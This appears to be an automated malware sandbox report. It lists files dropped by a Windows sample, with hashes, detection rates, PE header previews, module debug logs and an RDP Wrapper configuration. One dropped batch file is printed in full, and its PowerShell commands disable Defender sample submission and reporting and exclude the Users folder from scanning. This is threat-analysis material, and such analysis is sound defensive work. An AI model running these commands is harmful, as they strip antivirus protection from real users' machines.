                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):89088
                                                                                                                                                Entropy (8bit):6.205377670389132
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:y5rUJUohYhdi9PbahfxaxQo9uYN/kpYBbMQGwryimzgvmak7EoKk1dhJJY9V/Sbf:digoZax39NN/DBgQVmzg5kF/ctIN
                                                                                                                                                MD5:BB070CFBD23A7BC6F2A0F8F6D167D207
                                                                                                                                                SHA1:BDB8961F8AFB999AECE60BF1EF3E49E8E2349F7B
                                                                                                                                                SHA-256:C0860366021B6F6C624986B37B2B63D460DD78F657FC504E06F9B7ABBFDC2565
                                                                                                                                                SHA-512:93D052675636FBE98204EF8521B9F10F8A0CBCAC40E8835AD8249DAFD833C29B7F915A898671B21064D4ED6D04DA556D9D3647D03EB93232ADB2ACD2D7DC1F8A
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 70%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................*.....X.................@....................................-.....`... .................................................P............`..X............................................B..(....................................................text...X...........................`..`.data...............................@....rdata...Q.......R..................@..@.pdata..X....`.......0..............@..@.xdata.......p.......:..............@..@.bss....P................................idata..P............D..............@....CRT....`............V..............@....tls.................X..............@....reloc...............Z..............@..B................................................................................................................................................................................................................

                                                                                                                                                C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4379
                                                                                                                                                Entropy (8bit):5.3537078850672035
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:idHwW8J9VLyHzHH0H20HaSHomHu5SHSkmHSm5SHFmHOn5SHvSHhOmHX5SHpPR1zs:AzOTuTn0W06SLO5Suz5Skc5SPS/35SJM
                                                                                                                                                MD5:C6401B39F275E4F2BC3540EEBE96AEC6
                                                                                                                                                SHA1:30FB5AEFF27A4DDA562C94C7AAE85C5F57D8C212
                                                                                                                                                SHA-256:8BE17A7F07D957415F37B26F29D3EA82D412F4B50A70A6167689E794BB015F62
                                                                                                                                                SHA-512:CAA510C4E00E2BD5302CB65FF181DF27DC466FCCC030E9265760218E6ECE30BA3E2299417C5EE51280B5336FAC4D1792D09CCFFB97C26A52C142047B50684C88
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log)..[I] (debug_init) -> Done..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ff8c8850000)..[D] (module_get_proc) -> Done(hnd=0x00007ff8c8850000,name=RtlGetVersion,ret=0x00007ff8c888e520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=934d772a)..[I] (sys_init) -> Done(sys_uid=c76a8f08934d772a,sys_os_ver=10.0.19045.0.0)..[E] (package_install) -> Failed(pkg_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\,tgt_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\,err=00000003)..[I] (fs_file_read) -> Done(path=C:\Users\Public\Computer.{20d04fe0-3

                                                                                                                                                C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\npX5adYEH7eu.acl

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):456
                                                                                                                                                Entropy (8bit):3.2341395630162877
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:Ml8Pi7t8+d/fQfjfEWNfElsfghFfShFfgmSem4emzYWr:k8APd/oj8i8ls0FSFgID7r
                                                                                                                                                MD5:40AB00517F4227F2C3C334F1D16B65B4
                                                                                                                                                SHA1:F8D57AF017E2209B4FB24122647FD7F71B67C87C
                                                                                                                                                SHA-256:4BAF4B78D05A28AF7DEE7DBBCE2B4EDF6053D9239C1756C932BE9F2FEEE4EF85
                                                                                                                                                SHA-512:75D74306F043B864295F09A60C19A43494C226664733C99318989CE5C22CB9395BB407FB5C8C0268AD9184A79813304ED5FC943A6B53DB54F5F225CDA31650E3
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:C.o.m.p.u.t.e.r...{.2.0.d.0.4.f.e.0.-.3.a.e.a.-.1.0.6.9.-.a.2.d.8.-.0.8.0.0.2.b.3.0.3.0.9.d.}.....D.:.A.I.(.D.;.;.F.A.;.;.;.B.U.).(.A.;.;.F.A.;.;.;.B.A.).(.A.;.O.I.C.I.I.D.;.F.A.;.;.;.B.A.).(.A.;.I.D.;.F.A.;.;.;.S.Y.).(.A.;.O.I.C.I.I.O.I.D.;.F.A.;.;.;.C.O.).(.A.;.O.I.C.I.I.O.I.D.;.F.A.;.;.;.S.Y.).(.A.;.O.I.C.I.I.D.;.0.x.1.3.0.1.f.f.;.;.;.I.U.).(.A.;.O.I.C.I.I.D.;.0.x.1.3.0.1.f.f.;.;.;.S.U.).(.A.;.O.I.C.I.I.D.;.0.x.1.3.0.1.f.f.;.;.;.S.-.1.-.5.-.3.).....

                                                                                                                                                C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dll

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):105984
                                                                                                                                                Entropy (8bit):6.285421743969757
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:BQrD6CCk73WUJ/2WEvooF8VohjBdmaKqYdpFXaRQSCYA8CSs8qgu06wCYA8CSs8V:BA6sDl/2WEvo0DipFXaRQO
                                                                                                                                                MD5:6E01ED70D02CE47F4D27762A9E949DEE
                                                                                                                                                SHA1:32B9199EBBD7891CF0091B96BF3B2C9303AB7B7A
                                                                                                                                                SHA-256:EFB9B3D4356071EE8FE66979140E7435371EC668088A68786C6FDCEDF29D7376
                                                                                                                                                SHA-512:B21C8F79553EE513F6C48EFA618C20FB82CBC77EDE95579C28C21D8BB433B93D108CEF442B48ECBDABD0B06AA5C8AEDC8B26316167D1793A0E972B38D4210854
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y........................................@............`... .........................................^.......................T............0..h...............................(.......................`............................text...............................`..`.data........ ......................@....rdata..Pc...0...d..................@..@.pdata..T............n..............@..@.xdata...............x..............@..@.bss.... ................................edata..^...........................@..@.idata..............................@....CRT....X...........................@....tls......... ......................@....reloc..h....0......................@..B........................................................................................................................................................................

                                                                                                                                                C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4940
                                                                                                                                                Entropy (8bit):5.29136499790954
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:idHuN8J9VLr70He5555555555o55555555555555D:AONOTf70+5555555555o55555555555h
                                                                                                                                                MD5:49656B68BFF8175EBB4C7DCF41B24478
                                                                                                                                                SHA1:C3DF786695550FF65525BB954B10D2A020DDBD7D
                                                                                                                                                SHA-256:06C8EFD08247B4B3B616B805E4002E559BF6E48F855B3111FC9E48DF442B5616
                                                                                                                                                SHA-512:669EA6862D911F3B4962FCC47703A7DD3FC21A5AA83E3CD3C7341DBACE02D95A30831CE4618BA12D4E94ACFDE910B828C538B9D6370DA07E254A9859A663F46E
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ff8c8850000)..[D] (module_get_proc) -> Done(hnd=0x00007ff8c8850000,name=RtlGetVersion,ret=0x00007ff8c888e520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=934d772a)..[I] (sys_init) -> Done(sys_uid=c76a8f08934d772a,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ff8ba4fa8a0)..[I] (tcp_connect) -> Done(sock=0x3c0,host=7

                                                                                                                                                C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dll

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):129536
                                                                                                                                                Entropy (8bit):6.2852879161990645
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:UmeFYyUJdEqzx2LVJ4ngXsNXGRqnbxeGqS/h0E0P3j4NBtRLBhBr:UZUJdhxCJ4ngg46weh0dr4vnV
                                                                                                                                                MD5:88E6178B0CD434C8D14710355E78E691
                                                                                                                                                SHA1:F541979CAD7EE7C6D8F2B87A0F240592A5DC1B82
                                                                                                                                                SHA-256:7B40349481AD6C522A23FB3D12D6058EC0A7C5B387348FB4AE85135EE19C91A4
                                                                                                                                                SHA-512:C4330A9EE1E69785420AABCFD1991AAAEB0F1764EB7E857F0C86161F61E1FFD467B458A2D458D3C55BB76D00F26FAC481D026443AB0796D0AEF38BF06CD84B8F
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*.<..........Y.........,...................................../*....`... ...................................... ..^....0..D............................p..l...............................(...................p5...............................text....:.......<..................`..`.data........P.......@..............@....rdata.......`.......B..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^.... ......................@..@.idata..D....0......................@....CRT....X....P......................@....tls.........`......................@....reloc..l....p......................@..B........................................................................................................................................................................

                                                                                                                                                C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4753
                                                                                                                                                Entropy (8bit):5.4440687959784535
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:idHeN8J9VLoDNVDNVDN2DNVDNVDNVDNVDNVDNVDNVDNVDNVDND:A+NOTePPIPPPPPPPPPD
                                                                                                                                                MD5:196434F541505FEC30FD2275A3151AD2
                                                                                                                                                SHA1:43FFE2BEB86F3772D577ED7FAD4C7974F1213C82
                                                                                                                                                SHA-256:A7E9A3EA3F86531FDD310F71C6F32D36641EB7C21F8C27D3317ADBE5FF36EF2F
                                                                                                                                                SHA-512:CE8CBF6FA409D424AA1137E5E5005CE3589EF46C05E230683403503A236D224E7DBF59D1A45AE7369781E8C62EBEF9E9F1435E7E28F645A642308781348AAB22
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ff8c8850000)..[D] (module_get_proc) -> Done(hnd=0x00007ff8c8850000,name=RtlGetVersion,ret=0x00007ff8c888e520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=934d772a)..[I] (sys_init) -> Done(sys_uid=c76a8f08934d772a,sys_os_ver=10.0.19045.0.0)..[I] (scm_init) -> Done..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[I] (proxy_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ff8b919

                                                                                                                                                C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\referrer

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4
                                                                                                                                                Entropy (8bit):2.0
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:9:9
                                                                                                                                                MD5:006F29D8E822B9241020AEC2495EF819
                                                                                                                                                SHA1:6510BEB08A14B6BCC74D32031C1B19AA07169CF1
                                                                                                                                                SHA-256:69FF245F90727BBEFA5B1F82E2429FF74F31A6A5385B5129A2FE3378DCF200F1
                                                                                                                                                SHA-512:16916BC4477F6FC1AE1132D2F5D2B9587650DC44E23DE15E0FE787AFE23175E0E236C020C753BA5158F688BEACDA523AAFB7EC1DF82B6F7619573C90A48742E8
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:wgNj

                                                                                                                                                C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dll

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):37376
                                                                                                                                                Entropy (8bit):5.7181012847214445
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:2aS6Ir6sXJaE5I2IaK3knhQ0NknriB0dX5mkOpw:aDjDtKA0G0j5Opw
                                                                                                                                                MD5:E3E4492E2C871F65B5CEA8F1A14164E2
                                                                                                                                                SHA1:81D4AD81A92177C2116C5589609A9A08A5CCD0F2
                                                                                                                                                SHA-256:32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
                                                                                                                                                SHA-512:59DE035B230C9A4AD6A4EBF4BEFCD7798CCB38C7EDA9863BC651232DB22C7A4C2D5358D4D35551C2DD52F974A22EB160BAEE11F4751B9CA5BF4FB6334EC926C6
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........qc..qc..qc......qc...`..qc...g..qc..qb..qc...b..qc...f..qc...c..qc...j..qc......qc...a..qc.Rich.qc.................PE..d...#............." .....Z...>.......]...............................................a....`A.........................................~..........@...............................\... x..T............................p...............q..P............................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...P............z..............@....pdata...............|..............@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................

                                                                                                                                                C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dll

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):115712
                                                                                                                                                Entropy (8bit):6.25860377459178
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:+8zEo3EM0MBfGCqx22eMO4HROUeS2qjVO+n98TLmifu:LzEms12D4xOU31n98TLmh
                                                                                                                                                MD5:BD1D98C35FE2CB3E14A655AEDE9D4B01
                                                                                                                                                SHA1:49361C09F5A75A4E2D6E85FBDA337FC521770793
                                                                                                                                                SHA-256:961C65CFDF0187A945AD6099EFD9AF68D46D36EC309A2243F095EF739EE9AC7E
                                                                                                                                                SHA-512:74BFD70A08E2CB86AF10B83D0CFD723A24613C9E6E2018CDC63BD425D45845C1214BF68115E04F95572684F27A0CF52D271E2419F8056E0A0467B88507D132D4
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y........................................P.......p....`... .........................................^....................................@..p...............................(...................X................................text...8...........................`..`.data........0......."..............@....rdata..pi...@...j...$..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..p....@......................@..B........................................................................................................................................................................

                                                                                                                                                C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):12514
                                                                                                                                                Entropy (8bit):5.33408248494771
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:CFdHr+54yclD8cm9FLQIhs5ZR5mLU5+sR5HR5OKXbem5ZR5mLU5+sR5HR5OKXbeY:idHxN8J9VLjvvuvvvvvvvvvD
                                                                                                                                                MD5:94A7B22F4F218FD48101B2FA3B0D7B79
                                                                                                                                                SHA1:C078E2C913C9E2BF233B69A0C63C23290A4DFEA2
                                                                                                                                                SHA-256:99A7F1976DCB1B5C7980CFDB43025B069EC97DCDAC8DC3DA083B752A7787C4B3
                                                                                                                                                SHA-512:99781CEB5AAA844AA5E24AED13EE0679DA8CEE639AACB0621D75E810F1A664B24998C0BF03414A55CE36783454FA03A714A4602B81E4A50D9DE82046D46EC6BB
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ff8c8850000)..[D] (module_get_proc) -> Done(hnd=0x00007ff8c8850000,name=RtlGetVersion,ret=0x00007ff8c888e520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=934d772a)..[I] (sys_init) -> Done(sys_uid=c76a8f08934d772a,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (sam_init) -> Done..[I] (ebus_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ff8b915e342)..[I] (tcp_connect) -

                                                                                                                                                C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dll

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):91136
                                                                                                                                                Entropy (8bit):6.2041507656664825
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:SgYI/+tvE0A2HTsPtbNqnXi2h+t3w8S31+g5KvSxY:SgYIl2HIPtbNkrhPl+4K6e
                                                                                                                                                MD5:CB4F460CF2921FCD35AC53F4154FCBE0
                                                                                                                                                SHA1:AFD91433EF0C03315739FB754B16D6C49D2E51F2
                                                                                                                                                SHA-256:D6B5B5303D7079CF31EA9704E7711A127CFE936EA108CDFFF938C7811C6EDA31
                                                                                                                                                SHA-512:BEE872D6B1226409C472636255AE220BA8E0950C0D65DD0D8B9F3E90D43B65FFE2133B33648452C34A3F1BCA958F10BAF3FADBA5BF4228057928F4EEAC7AB600
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 70%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*.....`......Y.....................................................`... ..............................................................`..................d............................I..(......................h............................text...X...........................`..`.data...............................@....rdata.. T.......V..................@..@.pdata.......`.......8..............@..@.xdata..4....p.......B..............@..@.bss....@................................edata...............L..............@..@.idata...............N..............@....CRT....X............^..............@....tls.................`..............@....reloc..d............b..............@..B........................................................................................................................................................................

                                                                                                                                                C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.ini

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:Generic INItialization configuration [SLPolicy]
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):456534
                                                                                                                                                Entropy (8bit):5.450314708570292
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:ElNN33L+MUIiG4IvREWddadl/Fy/kY5Psv:EX33L+MBdadl/Fy/kr
                                                                                                                                                MD5:AC8B2EA4A310D6748A8845C235A3CDC8
                                                                                                                                                SHA1:0B489969C7D95411E4104B9BB952C0024EDE1616
                                                                                                                                                SHA-256:77BA4F6F25BA1050847C22B7AAF1E662650A99A15222466091FB056F436048E3
                                                                                                                                                SHA-512:0E807AF4D4E0D2F71FB8BE93DFCBCE62F3077E7C94B993529A0012088304A1B34BEDF8915EA23A83611FAB66495B1F8359225DBF95ED3F37C16607257217F191
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:; RDP Wrapper Library configuration..; Do not modify without special knowledge..; Edited by sebaxakerhtc....[Main]..Updated=2024-11-24..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionManager-AllowAppServerMode=1..TerminalServices-RemoteConnectionManager-AllowMultimon=1..TerminalServices-RemoteConnectionManager-MaxUserSessions=0..TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-89b14c2f072b-MaxSessions=0..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2..TerminalServices-RDP-7-Advanced-Compression-Allowed=1..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0..TerminalServices-RemoteConnectionManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000..TerminalServices-DeviceRedirection-Licenses-TS

                                                                                                                                                C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\update.pkg

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):10480965
                                                                                                                                                Entropy (8bit):6.710750822103746
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:196608:piRu5DnWLX6Cs3E1CPwDvt3uF8c339CMEdy:piRsCKCsU1CPwDvt3uFd9CMEY
                                                                                                                                                MD5:458F2D710689EA3CF61D5CD97C6B2470
                                                                                                                                                SHA1:BA71901A29F77715A3DC952578F6D249B944FE26
                                                                                                                                                SHA-256:47EFC91DA1E9481DB93259248A06349FB3EE58B0C7516A1570F212C3E1CE2119
                                                                                                                                                SHA-512:C1884FE6C0FB753D494BC095A43FB9E43DF7F9DB9AD02FCA4F73206D2590A1637119BF2EF5C090F7D502928D56B0838101A9FB56C58B3DB58BDA29D97977F421
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:.......referrer.wgNj....cnccli.dll.MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y........."h.............................P......JA....`... .........................................^....................................@..l...............................(.......................h............................text...x...........................`..`.data........0....... ..............@....rdata.. d...@...f...*..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..l....@......................@..B....................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:modified
                                                                                                                                                Size (bytes):64
                                                                                                                                                Entropy (8bit):0.34726597513537405
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Nlll:Nll
                                                                                                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:@...e...........................................................

                                                                                                                                                C:\Users\user\AppData\Local\Temp\7h14dhb9g32w177ypoi9wje.bat

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\Desktop\cZO.exe
                                                                                                                                                File Type:DOS batch file, ASCII text
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):259
                                                                                                                                                Entropy (8bit):4.933902901538645
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:hJKBnm61gV/eGgLSzomkNgBnm61gV/eGgVPgBnm61PeGgdEYJgrWy+5:unm0gViLUomqsnm0gViaBnm0SuQgrWt
                                                                                                                                                MD5:261A842203ADB67547C83DE132C7A076
                                                                                                                                                SHA1:6C1A1112D2797E2E66AA5238F00533CD4EB77B3D
                                                                                                                                                SHA-256:49ADF0FC74600629F12ADF366ECBACDFF87B24E7F2C8DEA532EA074690EF5F84
                                                                                                                                                SHA-512:7787C5F10EC18B8970F22B26F5BB82C4A299928EDB116A0B92FB000F2A141CCB4C8BCAB3AB91D5E3277ABDA8F2D6FE80434E4AEF5EE8A5CD3223CFB9989A6337
                                                                                                                                                Malicious:true
                                                                                                                                                Preview:@echo off..powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend".powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0".powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath '%HOMEDRIVE%\Users\'"..exit 1

                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0sgtamsq.ug0.psm1

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):60
                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
